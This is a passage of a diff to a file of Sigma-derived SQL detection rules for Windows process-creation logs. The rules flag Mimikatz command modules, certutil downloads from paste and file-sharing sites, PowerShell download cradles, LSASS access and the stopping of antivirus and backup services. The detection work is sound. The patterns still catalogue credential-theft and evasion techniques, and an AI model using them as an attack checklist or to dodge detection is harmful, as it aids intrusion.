LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", - "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "PUA - AdvancedRun Execution", + "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], + "description": "Detects the execution of AdvancedRun utility", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE 